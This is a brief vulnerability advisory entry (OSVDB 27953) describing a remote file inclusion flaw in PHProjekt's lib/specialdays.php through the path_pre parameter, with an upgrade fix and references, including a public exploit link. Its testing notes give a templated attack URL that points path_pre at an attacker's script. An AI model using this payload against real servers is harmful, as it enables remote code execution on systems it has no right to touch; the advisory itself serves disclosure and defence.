PHProjekt specialdays.php path_pre Variable Remote File Inclusion

2006-08-15T05:33:55
ID OSVDB:27953
Type osvdb
Reporter OSVDB
Modified 2006-08-15T05:33:55

Description

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts]

References:

Vendor URL: http://phprojekt.com/ Secunia Advisory ID:21526 Related OSVDB ID: 27952 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0264.html Mail List Post: http://attrition.org/pipermail/vim/2006-August/000994.html Generic Exploit URL: http://www.milw0rm.com/exploits/2190 CVE-2006-4204